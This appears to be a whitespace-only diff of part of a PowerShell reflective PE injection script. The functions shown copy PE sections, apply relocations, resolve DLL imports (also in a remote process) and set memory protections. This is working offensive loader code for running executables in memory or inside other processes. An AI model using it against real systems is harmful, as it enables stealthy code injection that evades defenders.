+        if (($Result -eq $false) -or ($NumBytesWritten -eq 0))
+        {
+            Throw "Call to ReadProcessMemory failed"
+        }
+        [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
 
         #Cleanup remote process memory
-		$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
-		$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
+        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
+        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
 
         if (-not $LoadByOrdinal)
         {
             $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
         }
-		
-		return $ProcAddress
-	}
-
-
-	Function Copy-Sections
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[Byte[]]
-		$PEBytes,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[System.Object]
-		$PEInfo,
-		
-		[Parameter(Position = 2, Mandatory = $true)]
-		[System.Object]
-		$Win32Functions,
-		
-		[Parameter(Position = 3, Mandatory = $true)]
-		[System.Object]
-		$Win32Types
-		)
-		
-		for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
-		{
-			[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
-			$SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
-		
-			#Address to copy the section to
-			[IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))
-			
-			#SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated
-			#    in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If
-			#    SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away,
-			#    so truncate SizeOfRawData to VirtualSize
-			$SizeOfRawData = $SectionHeader.SizeOfRawData
-
-			if ($SectionHeader.PointerToRawData -eq 0)
-			{
-				$SizeOfRawData = 0
-			}
-			
-			if ($SizeOfRawData -gt $SectionHeader.VirtualSize)
-			{
-				$SizeOfRawData = $SectionHeader.VirtualSize
-			}
-			
-			if ($SizeOfRawData -gt 0)
-			{
-				Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null
-				[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)
-			}
-		
-			#If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space
-			if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)
-			{
-				$Difference = $SectionHeader.VirtualSize - $SizeOfRawData
-				[IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))
-				Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null
-				$Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null
-			}
-		}
-	}
-
-
-	Function Update-MemoryAddresses
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[System.Object]
-		$PEInfo,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[Int64]
-		$OriginalImageBase,
-		
-		[Parameter(Position = 2, Mandatory = $true)]
-		[System.Object]
-		$Win32Constants,
-		
-		[Parameter(Position = 3, Mandatory = $true)]
-		[System.Object]
-		$Win32Types
-		)
-		
-		[Int64]$BaseDifference = 0
-		$AddDifference = $true #Track if the difference variable should be added or subtracted from variables
-		[UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)
-		
-		#If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do
-		if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `
-				-or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))
-		{
-			return
-		}
-
-
-		elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)
-		{
-			$BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)
-			$AddDifference = $false
-		}
-		elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)
-		{
-			$BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)
-		}
-		
-		#Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified
-		[IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))
-		while($true)
-		{
-			#If SizeOfBlock == 0, we are done
-			$BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)
-
-			if ($BaseRelocationTable.SizeOfBlock -eq 0)
-			{
-				break
-			}
-
-			[IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))
-			$NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2
-
-			#Loop through each relocation
-			for($i = 0; $i -lt $NumRelocations; $i++)
-			{
-				#Get info for this relocation
-				$RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))
-				[UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])
-
-				#First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase
-				[UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF
-				[UInt16]$RelocType = $RelocationInfo -band 0xF000
-				for ($j = 0; $j -lt 12; $j++)
-				{
-					$RelocType = [Math]::Floor($RelocType / 2)
-				}
-
-				#For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit.
-				#This appears to be true for EXE's as well.
-				#	Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx
-				if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
-						-or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
-				{			
-					#Get the current memory address and update it based off the difference between PE expected base address and actual base address
-					[IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))
-					[IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])
-		
-					if ($AddDifference -eq $true)
-					{
-						[IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
-					}
-					else
-					{
-						[IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
-					}				
-
-					[System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
-				}
-				elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)
-				{
-					#IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it
-					Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo"
-				}
-			}
-			
-			$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))
-		}
-	}
-
-
-	Function Import-DllImports
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[System.Object]
-		$PEInfo,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[System.Object]
-		$Win32Functions,
-		
-		[Parameter(Position = 2, Mandatory = $true)]
-		[System.Object]
-		$Win32Types,
-		
-		[Parameter(Position = 3, Mandatory = $true)]
-		[System.Object]
-		$Win32Constants,
-		
-		[Parameter(Position = 4, Mandatory = $false)]
-		[IntPtr]
-		$RemoteProcHandle
-		)
-		
-		$RemoteLoading = $false
-		if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)
-		{
-			$RemoteLoading = $true
-		}
-		
-		if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
-		{
-			[IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
-			
-			while ($true)
-			{
-				$ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
-				
-				#If the structure is null, it signals that this is the end of the array
-				if ($ImportDescriptor.Characteristics -eq 0 `
-						-and $ImportDescriptor.FirstThunk -eq 0 `
-						-and $ImportDescriptor.ForwarderChain -eq 0 `
-						-and $ImportDescriptor.Name -eq 0 `
-						-and $ImportDescriptor.TimeDateStamp -eq 0)
-				{
-					Write-Verbose "Done importing DLL imports"
-					break
-				}
-
-				$ImportDllHandle = [IntPtr]::Zero
-				$ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))
-				$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
-				
-				if ($RemoteLoading -eq $true)
-				{
-					$ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr
-				}
-				else
-				{
-					$ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)
-				}
-
-				if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))
-				{
-					throw "Error importing DLL, DLLName: $ImportDllPath"
-				}
-				
-				#Get the first thunk, then loop through all of them
-				[IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)
-				[IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk
-				[IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
-				
-				while ($OriginalThunkRefVal -ne [IntPtr]::Zero)
-				{
+
+        return $ProcAddress
+    }
+
+
+    Function Copy-Sections
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [Byte[]]
+        $PEBytes,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [System.Object]
+        $PEInfo,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [System.Object]
+        $Win32Functions,
+
+        [Parameter(Position = 3, Mandatory = $true)]
+        [System.Object]
+        $Win32Types
+        )
+
+        for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
+        {
+            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
+            $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
+
+            #Address to copy the section to
+            [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))
+
+            #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated
+            #    in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If
+            #    SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away,
+            #    so truncate SizeOfRawData to VirtualSize
+            $SizeOfRawData = $SectionHeader.SizeOfRawData
+
+            if ($SectionHeader.PointerToRawData -eq 0)
+            {
+                $SizeOfRawData = 0
+            }
+
+            if ($SizeOfRawData -gt $SectionHeader.VirtualSize)
+            {
+                $SizeOfRawData = $SectionHeader.VirtualSize
+            }
+
+            if ($SizeOfRawData -gt 0)
+            {
+                Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null
+                [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)
+            }
+
+            #If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space
+            if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)
+            {
+                $Difference = $SectionHeader.VirtualSize - $SizeOfRawData
+                [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))
+                Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null
+                $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null
+            }
+        }
+    }
+
+
+    Function Update-MemoryAddresses
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [System.Object]
+        $PEInfo,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [Int64]
+        $OriginalImageBase,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [System.Object]
+        $Win32Constants,
+
+        [Parameter(Position = 3, Mandatory = $true)]
+        [System.Object]
+        $Win32Types
+        )
+
+        [Int64]$BaseDifference = 0
+        $AddDifference = $true #Track if the difference variable should be added or subtracted from variables
+        [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)
+
+        #If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do
+        if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `
+                -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))
+        {
+            return
+        }
+
+
+        elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)
+        {
+            $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)
+            $AddDifference = $false
+        }
+        elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)
+        {
+            $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)
+        }
+
+        #Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified
+        [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))
+        while($true)
+        {
+            #If SizeOfBlock == 0, we are done
+            $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)
+
+            if ($BaseRelocationTable.SizeOfBlock -eq 0)
+            {
+                break
+            }
+
+            [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))
+            $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2
+
+            #Loop through each relocation
+            for($i = 0; $i -lt $NumRelocations; $i++)
+            {
+                #Get info for this relocation
+                $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))
+                [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])
+
+                #First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase
+                [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF
+                [UInt16]$RelocType = $RelocationInfo -band 0xF000
+                for ($j = 0; $j -lt 12; $j++)
+                {
+                    $RelocType = [Math]::Floor($RelocType / 2)
+                }
+
+                #For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit.
+                #This appears to be true for EXE's as well.
+                #   Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx
+                if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
+                        -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
+                {
+                    #Get the current memory address and update it based off the difference between PE expected base address and actual base address
+                    [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))
+                    [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])
+
+                    if ($AddDifference -eq $true)
+                    {
+                        [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
+                    }
+                    else
+                    {
+                        [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
+                    }
+
+                    [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
+                }
+                elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)
+                {
+                    #IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it
+                    Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo"
+                }
+            }
+
+            $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))
+        }
+    }
+
+
+    Function Import-DllImports
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [System.Object]
+        $PEInfo,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [System.Object]
+        $Win32Functions,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [System.Object]
+        $Win32Types,
+
+        [Parameter(Position = 3, Mandatory = $true)]
+        [System.Object]
+        $Win32Constants,
+
+        [Parameter(Position = 4, Mandatory = $false)]
+        [IntPtr]
+        $RemoteProcHandle
+        )
+
+        $RemoteLoading = $false
+        if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)
+        {
+            $RemoteLoading = $true
+        }
+
+        if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
+        {
+            [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
+
+            while ($true)
+            {
+                $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
+
+                #If the structure is null, it signals that this is the end of the array
+                if ($ImportDescriptor.Characteristics -eq 0 `
+                        -and $ImportDescriptor.FirstThunk -eq 0 `
+                        -and $ImportDescriptor.ForwarderChain -eq 0 `
+                        -and $ImportDescriptor.Name -eq 0 `
+                        -and $ImportDescriptor.TimeDateStamp -eq 0)
+                {
+                    Write-Verbose "Done importing DLL imports"
+                    break
+                }
+
+                $ImportDllHandle = [IntPtr]::Zero
+                $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))
+                $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
+
+                if ($RemoteLoading -eq $true)
+                {
+                    $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr
+                }
+                else
+                {
+                    $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)
+                }
+
+                if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))
+                {
+                    throw "Error importing DLL, DLLName: $ImportDllPath"
+                }
+
+                #Get the first thunk, then loop through all of them
+                [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)
+                [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk
+                [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
+
+                while ($OriginalThunkRefVal -ne [IntPtr]::Zero)
+                {
                     $LoadByOrdinal = $false
                     [IntPtr]$ProcedureNamePtr = [IntPtr]::Zero
-					#Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit
-					#	If the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint
-					#	and doing the comparison, just see if it is less than 0
-					[IntPtr]$NewThunkRef = [IntPtr]::Zero
-					if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0)
-					{
-						[IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal
+                    #Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit
+                    #   If the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint
+                    #   and doing the comparison, just see if it is less than 0
+                    [IntPtr]$NewThunkRef = [IntPtr]::Zero
+                    if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0)
+                    {
+                        [IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal
                         $LoadByOrdinal = $true
-					}
+                    }
                     elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]$OriginalThunkRefVal -lt 0)
-					{
-						[IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal
+                    {
+                        [IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal
                         $LoadByOrdinal = $true
-					}
-					else
-					{
-						[IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)
-						$StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))
-						$ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)
+                    }
+                    else
+                    {
+                        [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)
+                        $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))
+                        $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)
                         $ProcedureNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ProcedureName)
-					}
-					
-					if ($RemoteLoading -eq $true)
-					{
-						[IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal
-					}
-					else
-					{
-				        [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr)
-					}
-					
-					if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)
-					{
+                    }
+
+                    if ($RemoteLoading -eq $true)
+                    {
+                        [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal
+                    }
+                    else
+                    {
+                        [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr)
+                    }
+
+                    if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)
+                    {
                         if ($LoadByOrdinal)
                         {
                             Throw "New function reference is null, this is almost certainly a bug in this script. Function Ordinal: $ProcedureNamePtr. Dll: $ImportDllPath"
                         }
                         else
                         {
-						    Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath"
+                            Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath"
                         }
-					}
+                    }
+
+                    [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)
 
-					[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)
-					
-					$ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
-					[IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
-					[IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
+                    $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
+                    [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
+                    [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
 
                     #Cleanup
                     #If loading by ordinal, ProcedureNamePtr is the ordinal value and not actually a pointer to a buffer that needs to be freed
@@ -1858,556 +1847,550 @@ $RemoteScriptBlock = {
                         [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcedureNamePtr)
                         $ProcedureNamePtr = [IntPtr]::Zero
                     }
-				}
-				
-				$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
-			}
-		}
-	}
-
-	Function Get-VirtualProtectValue
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[UInt32]
-		$SectionCharacteristics
-		)
-		
-		$ProtectionFlag = 0x0
-		if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)
-		{
-			if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
-			{
-				if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
-				{
-					$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE
-				}
-				else
-				{
-					$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ
-				}
-			}
-			else
-			{
-				if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
-				{
-					$ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY
-				}
-				else
-				{
-					$ProtectionFlag = $Win32Constants.PAGE_EXECUTE
-				}
-			}
-		}
-		else
-		{
-			if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
-			{
-				if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
-				{
-					$ProtectionFlag = $Win32Constants.PAGE_READWRITE
-				}
-				else
-				{
-					$ProtectionFlag = $Win32Constants.PAGE_READONLY
-				}
-			}
-			else
-			{
-				if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
-				{
-					$ProtectionFlag = $Win32Constants.PAGE_WRITECOPY
-				}
-				else
-				{
-					$ProtectionFlag = $Win32Constants.PAGE_NOACCESS
-				}
-			}
-		}
-		
